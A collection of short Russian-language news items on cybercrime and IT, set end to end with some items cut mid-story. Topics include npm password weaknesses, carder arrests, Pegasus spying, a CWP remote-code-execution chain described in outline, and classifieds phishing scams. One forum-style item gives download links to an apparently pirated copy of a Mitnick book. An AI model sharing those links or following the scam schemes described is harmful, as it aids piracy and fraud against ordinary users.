Напомним, что в соответствии с проведённым в 2020 году исследованием, лишь 9.27% мэйнтенеров пакетов используют для защиты доступа двухфакторную аутентификацию, а в 13.37% случаев при регистрации новых учётных записей разработчики пытались повторно использовать скомпрометированные пароли, фигурирующие в известных утечках паролей. В ходе проверки надёжности используемых паролей удалось получить доступ к 12% аккаунтов в NPM (13% пакетов) из-за использования предсказуемых и тривиальных паролей, таких как "123456". В числе проблемных оказались 4 учётные записи пользователей из Top20 самых популярных пакетов, 13 учётных записей, пакеты которых загружали более 50 млн раз в месяц, 40 - более 10 млн загрузок в месяц и 282 с более 1 млн загрузок в месяц. С учётом загрузки модулей по цепочке зависимостей, компрометация ненадёжных учётных записей могла поразить в сумме до 52% от всех модулей в NPM.
Троих кардеров арестовали после того, как они вызвали подозрения во время шоппинга.
Группа кардеров была арестована в торговом центре в американском штате Мэриленд. Трое молодых людей в возрасте от 21 до 25 лет вызвали подозрение своим поведением, из-за которого продавцы предположили, что они пытаются совершать покупки с использованием чужих кредиток.
Бдительные сотрудники торгового центра сразу вызвали полицию. Прибывшим на место силовикам было на что посмотреть.
Выяснилось, что троица успела совершить покупки на сумму более 8000 долларов в одном из магазинов. Однако во втором начались какие-то затруднения с карточками. Их у молодых людей при себе было с избытком. После обысков силовики изъяли 29 кредиток. Помимо этого, у кардеров нашли 44 украденных чека. Все они задержаны без права внесения залога.
Цитата:
Brown, of Baltimore, was charged with:
19 misdemeanor counts of Larceny of Bank Checks
14 counts of Credit Card Theft
Six felonious counts of Larceny of Bank Checks
Two counts of Credit Card Fraud
Two counts of Forgery Checks
Receiving Stolen Property
Wearing Mask in Public to Conceal Identity
Possession of Fictitious ID
False ID to Law Enforcement
Oliver, of Owings Mills, was charged with:
12 counts of Credit Card Theft
10 misdemeanor counts of Larceny of Bank Checks
Three counts of Forgery of Bank Checks
Three felony counts of larceny of Bank Checks
Two counts of Credit Card Fraud
Possession of Less than 10 Counterfeit Checks
Receive Stolen Property
Wearing Mask in Public to Conceal Identity
Obstruction of Justice
Walker, of Baltimore, was charged with:
Five felony counts of Larceny of Bank Checks
Five counts of Forgery of Checks
Three counts of Credit Card Theft
Two counts of Credit Card Fraud
Misdemeanor Larceny of Bank Checks
Wearing a Mask in Public to Conceal Identity
Receive Stolen Property
Некоторые пользователи Instagram мечтают о синей галочке, которая свидетельствует о том, что их профиль является официальным и принадлежит публичной личности или организации. Они готовы выложить за нее до 500 тыс. рублей на черном рынке, где действуют посредники, предлагающие такие услуги. Но эксперты по PR и информационной безопасности утверждают, что такая практика не только бесполезна, но и опасна.
Как работает черный рынок. Посредники по подтверждению профиля в Instagram заявляют , что имеют контакты в компании Meta (владелец Instagram, признана в РФ экстремистской организацией) и могут обеспечить верификацию в течение нескольких дней. Они просят за услугу от 300 до 500 тыс. рублей, в зависимости от того, нужно ли создавать новый аккаунт с галочкой или ставить ее на существующий. Посредники не объясняют, как именно ставится галочка, но говорят, что у них есть большая команда, которая занимается верификацией аккаунтов.
Подтвердили наличие таких услуг и несколько специалистов по маркетингу. По их словам, раньше верификация была сложнее, так как Meta не предлагала платной верификации, а с февраля этого года она стала доступна за $12 в месяц.
Зачем нужна галочка. Синяя галочка в Instagram — знак того, что профиль подлинный и принадлежит реальной публичной личности или организации. Это повышает престиж и доверие к владельцу аккаунта, а также увеличивает его охват и поддержку от Meta. Но это не означает, что такой профиль имеет какие-то особые права или возможности. Он может столкнуться с теми же проблемами, что и другие профили, например, блокировкой, взломом или удалением.
Эксперты по PR считают, что синий значок — это желанный атрибут для блогеров и всех, кто хочет зарабатывать на своем аккаунте, например инфобизнесменов, потому что он усиливает их персональный бренд, повышает уровень доверия к ним, а вместе с тем и цены на их услуги. Верифицированные аккаунты помогают людям отличать реальных знаменитостей от фан-страниц.
Как получить галочку легально. Сейчас Instagram-аккаунты, которые соответствуют всем требованиям, могут пройти верификацию на основании документов, подтверждающих личность, и получить синюю галочку бесплатно или за $12 в месяц. Это официальный способ получить подтверждение профиля от социальной сети.
Эксперты по информационной безопасности предупреждают, что любые попытки получить подтверждение профиля в обход правил считаются мошенничеством, и модераторы социальной сети могут просто заблокировать страницу. Поэтому при покупке такой услуги нужно понимать, что для пользователей есть высокая вероятность потерять свои профили и деньги. Кроме того, если человек не доверяет продавцу или не знает его лично, то не стоит рисковать и покупать галочку, так как мошенник может потребовать доступ к аккаунту или документы пользователя для «верификации» его профиля. А это в свою очередь приведет к утечке личной информации.
«Подобного рода предложения на черном рынке ориентированы на вполне конкретную
аудиторию. Вполне логично, если кто-то отдает порядка полумиллиона за синюю
галочку в Instagram, он намерен отбить эти деньги и получить прибыль. То есть
это своего рода инвестиция в бизнес, причем отнюдь не в легальный», - говорят
эксперты.
По их словам, полученные таким образом значки часто используются
злоумышленниками для создания максимально правдоподобных фейковых аккаунтов.
Наиболее популярный вариант — распространение ссылок на вредоносные ресурсы и
вовлечение людей в различные мошеннические схемы.
«В голове человека формируется связка: галочка есть, значит, можно верить. В этот момент у жертвы отключается критическое мышление и желание перепроверять информацию, что способствует успеху социотехнической атаки», — добавили эксперты.
Многие международные компании, сотрудники которых работают в нескольких часовых поясах, сообщали, что им нужен автоматизированный способ отслеживать доступ к аккаунтам Google Analytics для аудита. Поэтому Google разработал для GА4 специальный инструмент Access Logging API.
Альфа-версия этого API поддерживает ресурсы Google Analytics 360 и составляет список пользователей, которые работают с данными ресурсов, а также предоставляет подробную информацию о доступе. В зависимости от запрашиваемых параметров, API может возвращать адрес электронной почты, платформу, с которой осуществлялся доступ, reportType (тип отчета) Google Analytics и временную метку доступа.
Кроме того, есть возможность создать агрегированную версию отчета, которая будет включать количество сеансов доступа и время последнего сеанса. Также API поддерживает различные сценарии, связанные с доступом и управлением ресурсами, например удаление пользователей, которые больше не входят в систему, или выявление ресурсов, которые никто не просматривает.
Подробнее о возможностях API можно прочесть здесь.
Напомним, в начале августа в Google Analytics 4 появилась возможность изменить срок действия файлов cookie и настройки их обновления. Этот новый метод управления файлами cookie через Analytics является альтернативой редактированию глобального кода тегов сайта или использованию Google Tag Manager.
Источник: Справка Google Analytics
Мониторинг ситуации с возможными кибератаками в КНДР в связи с поступавшими жалобами на перебои с интернетом ведут власти Южной Кореи. Об этом 27 января сообщает агентство Yonhap.
Отслеживание ситуации осуществляют соответствующие правительственные агентства. Подробностей по данному вопросу не сообщается.
По данным агентства Reuters, в КНДР 26 января исчез доступ в интернет на, как минимум, шесть часов. Основные сайты страны, в том числе официальный сайт МИД КНДР, смогли возобновить свою работу только к утру 27 января. По предварительным данным, на интернет-ресурсы Северной Кореи была осуществлена массированная DDoS-атака.
Стоит отметить, что кибератака произошла на фоне напряжённости, связанной с ракетными пусками, которые осуществила КНДР в январе.
Оперативное сопровождение по данному уголовному делу осуществляли сотрудники Управления по борьбе с противоправным использованием информационно- коммуникационных технологий (УБК) областного полицейского главка.
Следователями следственной части УМВД России по г. Екатеринбургу окончено расследование уголовного дела в отношении двух обвиняемых в совершении преступлений, предусмотренных чч. 2, 3 и 4 ст. 159 Уголовного кодекса Российской Федерации «Мошенничество».
Как было установлено в ходе предварительного следствия, в период с июля по ноябрь 2022 года обвиняемые через социальные сети создали шесть интернет- магазинов по доставке товаров различного ассортимента, получая в качестве предоплаты денежные средства от потенциальных покупателей. При этом выполнять взятые на себя обязательства перед потерпевшими обвиняемые не собирались. После получения денежных средств злоумышленники блокировали доступ к своему онлайн-сервису и добавляли доверчивых граждан в черный список.
Всего на счету обвиняемых - 45 эпизодов данной противоправной деятельности на общую сумму порядка 2,2 миллиона рублей.
В результате организованных оперативно-розыскных мероприятий сотрудникам УБК ГУ МВД России по Свердловской области удалось установить и задержать участников данной организованной группы. Один из них оказался жителем г. Тавды, 2003 года рождения, второй - жителем г. Екатеринбурга 2002 года рождения. Оба ранее не судимы. В настоящее время оба находятся под подпиской о невыезде.
16 томов данного уголовного дела в отношении преступной группы с утверждённым обвинительным заключением направлены в Чкаловский районный суд для рассмотрения по существу. Обвиняемым грозит наказание вплоть до 10 лет лишения свободы.
В Северный отдел полиции города Курска обратился местный житель. Около месяца он общался с «инвестиционными консультантами» и «вложил» в криптовалюту 2 700 000 рублей, но теперь лишился доступа к средствам.
Как рассказал 33-летний курянин, к идее инвестировать в криптовалюты он пришел после общения на некоей интернет-платформе. Инвестиционные консультанты убедили потерпевшего, что криптовалюты ― лучший способ поправить свое финансовое положение, а они «помогут» ему не прогореть при вложениях в цифровые активы.
«После переписки последовала череда необдуманных финансовых вложений. Неизвестные лица предложили мужчине заработать на реализации крупного проекта по купле-продаже криптовалюты. Навязчивость и спешка во времени не послужили поводом для каких-либо опасений. Напротив, потерпевший строго выполнял действия посторонних лиц, в результате чего и лишился свыше 2 700 000 рублей», ― сообщила пресс-служба УМВД России по Курской области.
Сейчас полицейские пытаются установить личности мошенников. Было возбуждено уголовное дело по статье о мошенничестве в особо крупном размере.
На протяжении многих лет австрийские интернет-провайдеры выполняли требования судов, ограничивая пиратские ресурсы с помощью технологии DNS. Летом 2022 года ситуация кардинально изменилась .
В судебных решениях впервые появились не только доменные имена, но и списки IP. Когда провайдеры обнаружили, что эти адреса принадлежат сервису Cloudflare, используемому множеством законных сайтов, они были озадачены.
Выполнить требование было их юридической обязанностью. В результате в Австрии оказались недоступны многие невиновные ресурсы, что привело к нарушениям работы всего интернета.
Телекоммуникационная контрольная комиссия (Telekom-Control-Kommission, TCK) сразу же начала расследование . По мнению специалистов, блокировка IP нарушает принцип сетевой нейтральности, закрепленный в законодательстве ЕС.
«Поскольку через один IP-адрес можно получить доступ к бесчисленному количеству веб-сайтов, риск блокировки интернет-ресурсов непричастных третьих лиц особенно высок», — заявил представитель.
TCK считает, что технологии DNS вполне достаточно для защиты интересов правообладателей. Технология не ограничит доступ к законному контенту.
7 августа TCK приняла решение полностью запретить блокировку IP-адресов на территории Австрии.
Решение регулятора сразу получило широкую поддержку сторонников сетевой нейтральности. Оно стало важным прецедентом для всей Европы. Позиция TCK будет учитываться при обсуждении политики борьбы с пиратством в других странах.
В общественности решение расценивают как важный шаг для защиты свободы слова и интересов интернет-пользователей.
Ведущие новостные издания недовольны тем, что их оригинальный контент используется компаниями-разработчиками ИИ для обучения генеративных ИИ- моделей. New York Times, News Corp, Axel Springer, IAC и другие компании формируют коалицию, чтобы противостоять Google и OpenAI. Об этом сообщило издание Semafor.
Проблема заключается в неконтролируемом сборе контента, который осуществляют компании для обучения своих больших языковых моделей (Large Language Model, LLM). Это стало общей проблемой для издателей и создателей контента и уже привело к ряду судебных исков.
Google и OpenAI уже сталкивались с несколькими коллективными исками. Но эта ситуация выглядит гораздо серьезнее, поскольку IAC – холдинг, инициирующий судебное разбирательство, – поддерживается двумя крупными медиахолдингами, The New York Times Company и News Corp, а также европейским многонациональным издателем Axel Springer.
Все эти компании, как сообщается, близки к созданию коалиции, которая может возглавить судебный процесс и настоять на законодательных действиях. Цель компаний – добиться введения новых норм и правил, регулирующих обучение ИИ- моделей на основе медиаконтента.
Отметим, что многие издания уже экспериментируют с ИИ-инструментами, направленными на повышение эффективности написания текстов. Например, немецкий таблоид таблоид Bild ещё в июне объявил о сокращении расходов на €100 млн. и увольнении около 200 сотрудников . Издательство Axel Springer SE, которому принадлежит Bild, также заявило, что планирует использовать искусственный интеллект для выполнения некоторых задач, которые раньше выполняли журналисты.
Однако наиболее существенной проблемой для издателей, по всей видимости, является не столько угроза сокращения персонала, сколько потеря доходов. По данным Semafor, компании опасаются, что Google может прекратить отправлять трафик на сайты изданий, и вместо этого просто давать текстовые ответы на запросы пользователей с помощью чат-бота. Например, ссылку на обзор вина на сайте Food & Wine, принадлежащем IAC, можно заменить простой текстовой рекомендацией бутылки — без указания авторства.
Google начала испытания своего нового продукта, Genesis, который использует искусственный интеллект для создания новостных статей . Этот инструмент на стадии тестирования доступен нескольким крупным изданиям, таким как NY Times, Washington Post и Wall Street Journal. Genesis, работающий под предварительным названием, умеет агрегировать информацию, включая подробности актуальных событий, и генерировать новостной контент.
Федеральная торговая комиссия США (Federal Trade Commission, FTC) начала расследование деятельности компании OpenAI и её искусственного интеллекта ChatGPT на предмет нарушения законов о защите прав потребителей, сообщает The Washington Post.
Претензии были высказаны после того, как в прошлом месяце радиоведущий из штата Джорджия обратился в суд с обвинениями в адрес OpenAI . Он утверждал, что ChatGPT упомянул его в контексте преступной деятельности, тем самым оклеветав его м нанеся ущерб его репутации.
Ранее, в апреле, мэр одного из городов Австралии также угрожал иском против OpenAI. По его словам, ChatGPT заявил о его участии в коррупционном скандале . OpenAI был дан срок в 28 дней для исправления работы своей ИИ-модели, однако с тех пор информации о дальнейших юридических действиях не поступало.
В МИД Финляндии сообщили, что дипломаты страны стали объектом кибершпионажа.
Случившееся коснулось сотрудников ведомства, отправленных на работу за границу, отметило министерство.
Сотрудники МИД Финляндии оказались объектами кибершпионажа с помощью шпионской программы Pegasus. Об этом министерство сообщило в пятницу.
"Финские дипломаты стали объектом кибершпионажа с использованием ставшей широко известной шпионской программы Pegasus компании NSO Group.
Министерство изучило этот случай совместно с различными другими ведомствами и заинтересованными группами в течение осени и зимы 2021 и 2022 годов. Случившееся коснулось сотрудников, отправленных на работу за границу", - говорится в сообщении.
В настоящее время, добавили в МИД, слежка не ведется.
В середине лета базирующаяся во Франции неправительственная организация Forbidden Stories и 17 СМИ различных государств опубликовали результаты расследования, в которых утверждается, что некоторые страны могли вести слежку за десятками тысяч человек по всему миру с помощью троянской программы для мобильных телефонов Pegasus.
Как сообщила британская газета The Guardian, участвовавшая в журналистском расследовании, целями слежки могли быть руководители международных организаций, правительств и государств.
В самой израильской компании NSO Group, разработавшей программу, утверждают, что право на использование программы Pegasus предоставляется исключительно государствам и государственным агентствам по специальному разрешению израильских властей.
В сентябре американская компания Apple сообщила о выпуске обновления для iPhone 6 и всех более поздних поколений телефонов, а также всех планшетов компании. Оно было призвано устранить уязвимости, которые позволяли вредоносным программам получить контроль над телефоном в обход действий пользователя.
Одна из проблем была обнаружена исследовательской группой The Citizen Lab, занимающейся исследованиями в сфере кибербезопасности при университете Торонто в Канаде. Согласно ее информации, именно данная уязвимость, эксплуатирующая недостатки защиты при работе с PDF-файлами, была использована NSO Group при создании шпионской программы Pegasus.
The Citizen Lab утверждает, что уязвимость давала возможность получить контроль не только над телефонами и планшетами, но и над компьютерами Apple, работающими на операционной системе macOS. Исследователи утверждают, что уязвимость была известна хакерам с февраля 2021 года и с этого времени могла использоваться в их целях.
Американец получил два года реального срока и три года условного за элегантное преступление, которое он попытался совершить в 2018 году. Тогда житель Флориды вместе с сообщниками попытался взломать бензоколонку в штате Айдахо, чтобы установить внутрь скиммер. Делал он это обычным ломом.
Адриан Акоста Алонсо (Adrian Acosta Alonso), которому на момент происшествия было 29 лет, вынужден был скрыться с места преступления вместе с подельниками после того, как сотрудник заправки вызвал полицию. Тем не менее их вскоре нашли в припаркованном фургоне и взяли под стражу. В автомобиле обнаружили также скиммеры, считыватели чипов, считыватели и кодировщики пластиковых карт, а также защитные пломбы для бензоколонок. Сами кредитки тоже нашли — 55 пустых и 15 уже записанных. На всех были выбиты имена Алонсо или его сообщников.
Спустя несколько месяцев содержания под стражей Алонсо внес залог, а потом признал себя виновным. Однако в ноябре 2019 года, когда судья должен был огласить приговор, американец на заседание не явился, сбежав на Кубу, паспорт которой у него тоже был. Тем не менее в декабре 2022 года мужчина зачем-то вернулся в США и был задержан при пересечении государственной границы, чтобы спустя еще без малого год наконец выслушать свой приговор.
source: eastidahonews.com/2023/11/man-who-ran-credit-card-skimming-scheme-at- idaho-gas-stations-is-sentenced-to-prison
The Art of Deception is a book by Kevin Mitnick that covers the art of social
engineering. Part of the book is composed of real stories and examples of how
social engineering can be combined with hacking. All, or nearly all, of the
examples are fictional but quite plausible.
**Source
](https://gofile.io/d/9HWawI)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
](https://anonfiles.com/y1B7Vf33zb/Kevin_Mitnick_The_Art_of_Deception_pdf)
anonfiles.com
**
Несмотря на все прогнозы, криптовалюты не дорожают. Биткоин замер у отметки 30 тысяч долларов, но добыча его приносит фермерам неплохую прибыль, поэтому мощности постоянно увеличиваются, а количество майнеров растёт. А вот видеокарты, которые ранее фермеры использовали для генерации Эфира, медленно приходят в негодность. Дело в том, что после перехода Эфира на стейкинг, ни одна альтернативная криптовалюта не смогла занять место ушедшего актива. В результате рынок переполнен бывшими в употреблении видеокартами, а особенно подобных продуктов много в Китае. Эксперты отмечают, что причина в том, что местные власти и вовсе запретили криптовалюты, а добыча стала вне закона. Какое-то время в Поднебесной оставались рабочие фермы, но уже достаточно давно все они копают в минус, что не позволяет зарабатывать даже самым отчаянным майнерам. Похоже, эти ребята начали сливать видеокарты на рынок в больших объёмах, на что обратила внимание местная полиция.
Преступники, воспользовавшись окончанием бума майнинга, скупают бывшие в употреблении графические карты, очищают их, переупаковывают, а затем продают как новые, обманывая потенциальных покупателей. При этом такие видеокарты могут обладать сниженной производительностью и в целом оказаться ненадёжными и выйти из строя намного раньше, чем магазинный экземпляр. Причина в том, что многие видеокарты работали на фермах 3 и больше лет и выключались только для проведения профилактики. Эксперты отмечают, что ресурс подобной продукции в значительной мере исчерпан, тогда как мошенники продают видеокарты под видом новых. Большая часть новых владельцев даже не подозревает о подлоге, тогда как некоторые замечают, что чипы памяти имеют жёлтый оттенок и следы использования. Что любопытно, дабы избежать раскрытия подлога, некоторые мошенники даже покрывают микросхемы памяти специальным красителем, что позволяло скрывать следи многолетней работы на ферме.
Полиция выяснила, что участие в незаконной деятельности принимало значительное количество людей, отвечавших за покупку бывших в употреблении графических процессоров, их очистку и переупаковку. Поддельные карты были намеренно маркированы неправильно, чтобы обмануть покупателей. Стоимость поддельных видеокарт, замешанных в этом деле, оценивается в более чем 15 миллионов юаней (около 2 миллионов долларов). В результате операции 22 члена преступной группировки были арестованы полицией, а семеро из них уже привлечены к уголовной ответственности. Правоохранители полагают, что нанесли серьёзный удар по рынку поддельных видеокарт в Китае, а также раскрыли схемы подлога и переупаковки.
Эксперты отмечают, что купить подобные видеокарты можно не только в самом Китае, но и через популярные электронные магазины. Рынок слишком большой, а арест одной группировки не способен полностью перекрыть кислород мошенникам. Эксперты уверены, что со временем проблема решиться сама собой, поскольку уже достаточно давно майнеры не покупают новых графических чипов для добычи криптовалют. Ну а всё то, что сегодня считается актуальным и подходит для игр, стремительно устаревает. Уже через 3 года мошенникам придётся искать себе новые способы заработка.
Эксперты предупредили, что две уязвимости, влияющие на Control Web Panel (CWP, ранее CentOS Web Panel), могут быть объединены в цепочку, после чего неавторизованные злоумышленники получат возможность удаленного выполнения кода (RCE) от имени пользователя root на уязвимых серверах Linux.
Хотя официальный сайт CWP утверждает, что около 30 000 серверов работают под управлением CWP, журналисты Bleeping Computer обнаружили в интернете более 80 000 серверов CWP, использовав для поиска BinaryEdge.
Два бага были обнаружены ИБ-специалистом Паулосом Ибело (Paulos Yibelo) из компании Octagon Networks. Ошибки представляют собой проблему включения файлов (CVE-2021-45467) и проблему записи файлов (CVE-2021-45466), которые вместе становятся RCE-уязвимостью.
Эксплуатация багов требует обхода средств защиты, чтобы злоумышленник могли получить доступ к защищенному разделу API без аутентификации. Этого можно добиться, зарегистрировав ключ API (с помощью ошибки включения файла) и создав вредоносный файл author_keys на сервере (с помощью ошибки записи).
Хотя проблема CVE-2021-45467 уже исправлена, Octagon Networks заявляет, что специалисты компании видели, как злоумышленникам удавалось обойти патчи и атаковать уязвимые серверы.
Исследователи обещают, что выпустят PoC-эксплоит, как только достаточное количество серверов Linux с CWP на борту обновятся до последней версии.
• Video:
Волгоградские сотрудники полиции задержали 24-летнего мошенника из Пензенской области, который подозревается в оказании фейковых интим-услуги в интернете.
В пресс-службе МВД России по Волгоградской области сообщили, что пензенский аферист создал сайты с объявлениями о предоставлении услуг сексуального характера и публиковал там фиктивные анкеты девушек. Их фотографии он брал из открытых источников.
В телефонных разговорах мошенник подделывал женский тембр голоса и озвучивал стоимость сексуальных услуг, а также предлагал так называемые дополнительные услуги. Также злоумышленник разговаривал от имени администратора сайта и требовал оплатить «дополнительную страховку».
В ловушку мошенника попался 18-летний волгоградец, который перевел ему 97 тысяч рублей. Юноша написал заявление в полицию.
Правоохранители задержали подозреваемого на территории Пензенской области. В доме у него нашли мобильные телефоны и банковские карты.
Следователи уже возбудили уголовное дело по статье «мошенничество». В настоящее время решается вопрос о заключении подозреваемого под стражу.
По версии полиции, в 2020 году двое жителей Свердловской области, будучи сотрудниками юридических фирм, узнав, что на банковском счёте покойной имеется крупная сумма сбережений, оформили задним числом фиктивные договоры о предоставлении ей различных услуг. После этого они обратились в суд и взыскали мнимую задолженность в размере около 2 млн рублей, которыми затем распорядились по своему усмотрению.
Аферисты были задержаны полицейскими в ходе служебной командировки в Екатеринбург.
В отношении подозреваемых возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 УК РФ. один из фигурантов Один из фигурантов заключён под стражу, а другому избрана мера пресечения в виде запрета определённых действий и залога.
В производстве у следователя отдела по расследованию преступлений, совершенных с использованием информационных технологий, средств мобильной связи, сети Интернет и вредоносного программного обеспечения, СУ УМВД России по городу Омску находится 59-эпизодное уголовное дело, возбужденное по п. «г» ч. 3 ст. 158 УК РФ «Кража». Подозреваемый – 20-летний омич, который похищал денежные средства граждан под предлогом покупки товаров на сайте бесплатных объявлений.
По имеющимся у следствия данным, информацию о легком заработке молодой человек нашел в мае 2020 года в одном из мессенджеров. Задача состояла в том, чтобы искать на сайтах бесплатных объявлений продавцов и списываться с ними: злоумышленник представлялся женщиной, интересовался детскими товарами и сообщал, что проживает в поселке Азово Омской области. Так как встретиться лично нет возможности, предлагал воспользоваться специальным сервисом, который, по его словам, гарантировал безопасность сделки.
Фигурант отправлял собеседнику специальную ссылку, которую получал в мошенническом чат-боте. Продавцам необходимо было перейти по ней, ввести личные, банковские данные и сумму – таким образом «зарезервировать» товар. После получения его покупателем деньги автоматически должны были поступать на карту отправителя. Вместо этого потерпевшие сталкивались с крайне неприятной ситуацией: с карты происходило списание, а злоумышленник уверял, что это ошибка, и предлагал пройти по новой ссылке – опять же мошеннической, но внешне схожей с известной торговой площадкой. В надежде вернуть свои деньги продавцы поддавались на уловки «покупателя» и лишались различных сумм: от 2 000 до 20 000 рублей.
Сотрудники уголовного розыска установили: потерпевшие – в основном женщины в возрасте 30-35 лет, проживающие в разных городах и регионах России (Москва, Санкт-Петербург, Краснодар, Ставрополь, Ростов-на-Дону, Чита, Улан-Удэ, Дагестан) – продавали детские вещи, обувь, коляски, ходунки, конверты для новорожденных и т.п. Списанные с их счетов денежные средства сначала уходили на криптовалютный кошелек, а уже оттуда 70 % получал подозреваемый, остальные 30 – кураторы чат-бота.
В сентябре текущего года, когда оперативники задержали фигуранта, выяснилось, что его доход за весь период противоправной деятельности составил более 2 млн рублей. Молодой человек купил дорогостоящий автомобиль, тратил деньги на развлечения. Общая сумма материального ущерба, причиненного потерпевшим, устанавливается.
За кражу, совершенную с банковского счета, предусмотрено максимальное наказание в виде лишения свободы на срок до 6 лет.
В последнее время жители южных регионов России столкнулись с проблемами доступа к VPN-сервисам, в т.ч. основанным на прокси-протоколе Shadowsocks. Этот протокол позволяет обходить блокировки, установленные интернет- провайдерами. Отмечается также, что сервис Outline, популярное решение для создания собственных VPN-серверов на базе Shadowsocks, также не работает. Кроме того, сервис Телеграм испытывает проблемы с доступом в этих регионах уже в течение суток.
Shadowsocks был создан в 2012 году китайским разработчиком, известным под псевдонимом clowwindy, в ответ на усиление цензуры в Китае. В отличие от стандартных VPN-протоколов, он не формирует зашифрованный туннель между клиентом и сервером, а предоставляет шифрование и обфускацию трафика, делая его менее заметным для систем блокировки, например, Великого китайского файрвола.
Протокол Shadowsocks прикидывается мусором в трафике и его невозможно выявить сигнатурными методами. Поэтому вместе с Telegram и VPN было заблокировано множество других сервисов - онлайн игры, видеозвонки и различные потоковые данные.
В свете последних событий специалисты высказывают опасения относительно возможного распространения блокировок VPN-сервисов на основе протокола Shadowsocks на всей территории России. Если такое развитие ситуации подтвердится, это может затронуть многих пользователей, которые привыкли пользоваться данным протоколом для обхода блокировок и санкционных ограничений.
Подробнее: https://www.securitylab.ru/news/543216.php
**Корпорация Google начала блокировать корпоративные сервисы Google Workspace (корпоративная почта, документы, диск и т.д.) ряду российских компаний, попавших под санкции США.
Об этом пишет "Коммерсантъ" со ссылкой на источники в двух крупных IT-компаниях.
По словам собеседников газеты, в ночь на 10 августа Google начала массово блокировать корпоративные сервисы Google Workspace (корпоративная почта, "Google Документы", "Google Диск" и т.д.) для российских компаний, которые находятся под санкциями.
"После блокировки сервисов сотрудники компании не могут зайти в корпоративную почту, воспользоваться электронным документооборотом через Google Docs, из-за чего есть риск финансовых и репутационных потерь, почти все важные документы и переписки остались в корпоративном хранилище Google", - рассказал один из источников.
Собеседник в другой крупной компании отметил, что сейчас около 30% всей корпоративной информации российских компаний хранится на американской площадке Google Workspace.
"Многие организации до конца оттягивают переход на альтернативные рабочие пространства, например "Яндекса", надеясь, что Google заранее предупредит о блокировке", - сказал он.
По словам источника газеты, в рассылке, которая пришла сотрудникам российских IT-компаний, американская корпорация аргументировала блокировку "спам- сообщениями".
Собеседник издания на IT-рынке уверен, что Google продолжит блокировать российские предприятия, которые находятся под санкциями ЕС или США, "более того, американская компания может делать это без предупреждения, что не позволит компаниям сделать резервное копирование на альтернативные площадки".
В мае 2022 года сообщалось, что Google намерен ликвидировать российское ООО "Гугл" и вывезти за границу сотрудников, которые захотят продолжить работать в компании.
В июне ООО "Гугл" подало заявление о собственном банкротстве.**
Сенаторы Андрей Турчак и Ирина Рукавишникова, вместе с депутатом Александром Хинштейном, представили премьер-министру Михаилу Мишустину заключительную версию законопроекта, устанавливающего штрафы за нарушения защиты персональных данных. Об этом сообщает «РБК», ссылаясь на копию проекта.
В документе представлены поправки к Кодексу об административных правонарушениях (КоАП). Согласно предложению, штрафы за нарушения будут следующими:
-от 3 до 5 млн рублей для юридических лиц, если утечка затронула от 1 до 10
тыс. граждан;
-от 5 до 10 млн рублей, если число затронутых граждан составляет от 10 до 100 тыс.;
-от 10 до 15 млн рублей в случае, если утечка затронула более 100 тыс. человек.
При повторном нарушении, независимо от масштаба, предлагается ввести штраф в размере от 0,1% до 3% от годового оборота за предыдущий год или за часть текущего, но не менее 15 млн руб. и не более 500 млн руб.
За утечки биометрических данных предусматривается штраф для юридических лиц от 15 до 20 млн руб. В проекте также предлагается различный размер штрафов за утечки персональных данных для граждан и должностных лиц.
В настоящее время максимальный штраф для компаний за утечки данных составляет до 100 тыс. руб. и до 300 тыс. руб. за повторное нарушение. Ожидается, что поправки вступят в силу через 30 дней после официальной публикации.
В пояснительной записке к проекту закона указаны данные «Лаборатории Касперского». Согласно отчёту компании, злоумышленники опубликовали в 2022 году 168 значимых баз данных российских компаний, в которых было выложено более 2 млрд. записей. Утечки включают почти 300 млн. пользовательских данных, из которых около 48 млн. строк содержали пароли. Большая часть пользовательских данных (64%) была скомпрометирована в результате атак на крупный бизнес. Лидерами по объему утекшей информации были сферы доставки (34%) и ритейла (14%).
Функция позволит избежать нарушения авторских прав и увеличит взаимопомощь разработчиков.
GitHub Copilot получил важное обновление, направленное на более гибкое взаимодействие с публичными репозиториями.
Ранее в 2022 году GitHub представил функцию ссылки на код, блокирующую автоматические предложения кода, которые совпадают с публичными репозиториями. Вчера компания объявила о запуске закрытого бета-тестирования новой функции, которая предлагает разработчикам больше контроля и выбора.
Новая функция при включении не блокирует сгенерированный код, совпадающий с публичными репозиториями, а отображает его в боковой панели, позволяя разработчику решить, что с ним делать: использовать, отклонить, или поручить Copilot переписать его так, чтобы он не совпадал с оригинальным кодом. В последствии, функция будет доступна и в Copilot Chat.
Пример работы функции
Обновление позволит разработчикам изучать различные библиотеки и отправлять запросы на изменение кода, вместо того чтобы генерировать код, который уже существует в открытом доступе.
Существенным элементом новой функции является быстрый поисковый движок, который обеспечивает поиск соответствующего кода и его лицензии. В будущем GitHub планирует добавить опцию сортировки найденного кода по лицензии репозитория, дате коммита и другим параметрам. Новое обновление призвано сделать процесс кодирования более гибким и интуитивным, давая разработчикам больше контроля и возможностей для исследования.
Исследователи Infoblox напоминают организациям о важности мониторинга системы доменных имён.
Группа неизвестных хакеров активно разрабатывает и применяет в реальных атаках новый набор инструментов для вредоносного ПО под названием «Decoy Dog». Это ПО эксплуатирует систему доменных имён (DNS) для контроля и управления узким кругом взломанных устройств. Об этот сообщила компания Infoblox, специализирующаяся на IT-автоматизации и кибербезопасности.
После первичного раскрытия данной угрозы в апреле киберпреступники, ответственные за разработку Decoy Dog, быстро отреагировали и адаптировали свои системы для обеспечения непрерывной работы и сохранения доступа к уже скомпрометированным устройствам.
Хакеры изменили поведение DNS-ответов контроллеров, добавили ограничения геолокации и переместили клиентов на новые контроллеры, чтобы обеспечить к ним непрерывный доступ.
«Decoy Dog — это принципиально новое, ранее неизвестное вредоносное ПО со многими функциями сохранения постоянства на взломанном устройстве», — сообщили исследователи Infoblox.
У экспертов есть весьма оправданные опасения, что это секретный инструмент, используемый в текущих кибератаках государственного уровня акторами определённой страны. Многие аспекты Decoy Dog остаются загадкой, а полный объём её возможностей пока неизвестен.
На данный момент зловредную активность Decoy Dog можно выявить только с помощью алгоритмов обнаружения DNS-угроз. И это единственный на сегодня способ защиты от этой угрозы. Исследователи выявили уже как минимум три группы злоумышленников, использующих это вредоносное ПО.
